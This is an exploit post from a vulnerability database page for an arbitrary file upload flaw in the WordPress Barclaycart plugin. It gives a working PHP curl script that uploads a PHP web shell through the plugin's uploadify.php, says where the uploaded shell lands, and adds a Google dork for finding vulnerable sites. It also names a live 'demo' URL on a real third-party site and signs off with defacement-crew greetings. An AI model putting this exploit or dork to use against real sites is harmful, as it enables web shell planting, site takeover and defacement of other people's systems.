WordPress Barclaycart Shell Upload

2014.03.06
Credit: eX-Sh1Ne
Risk: High
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-264

WordPress Barclaycart Plugins Arbitrary File Upload ###################################################################################### # Author : eX-Sh1Ne # # Facebook : www.fb.me/ShiNe.gov # # Google Dork => inurl:"wp-content/plugins/barclaycart" # ####################################################################################### Vuln : wp-content/plugins/barclaycart/uploadify/uploadify.php Exploit : <?php $uploadfile="Sh1Ne.php"; $ch = curl_init("http://127.0.0.1/wp-content/plugins/barclaycart/uploadify/uploadify.php"); curl_setopt($ch, CURLOPT_POST, true); curl_setopt($ch, CURLOPT_POSTFIELDS, array('Filedata'=>"@$uploadfile", 'folder'=>'/wp-content/plugins/barclaycart/uploadify/')); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); $postResult = curl_exec($ch); curl_close($ch); print "$postResult"; ?> ------------------------------------------------------------------------------------- Shell Access : http://localhost/wp-content/plugins/barclaycart/uploadify/Sh1Ne.php or http://localhost/wp-content/uploads/[years]/[month]/ << Find your shell ------------------------------------------------------------------------------------- Demo : https://www.rpgrouponline.com/wp-content/plugins/barclaycart/uploadify/uploadify.php ------------------------------------------------------------------------------------- sh00tz : [+] Java Defacer Team - IDCA Team - No-Name Crew - IL-c0de - Bandung Blackhat [+] Admin07 - Freezer22 - Pr0blemNymouz - Black Style - FH04ZA - MS06-87 - hantu_j4va - Antonio HsH - Taqiyya [+] Mr. Xenophobic - Deflectoz - DeYuBi-Cyber - Mbah_Dukun - Mr./AryeaKoplaxz404 - Sanja07 - ice-cream - p0zh1e - [+] K4C3 Undetected - Gastr0 [ Exploit4Arab.Net ] [ NOTE ] [+] Java Defacer Team still r0x ! \!/ INDONESIAN PEOPLE HERE \!/


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top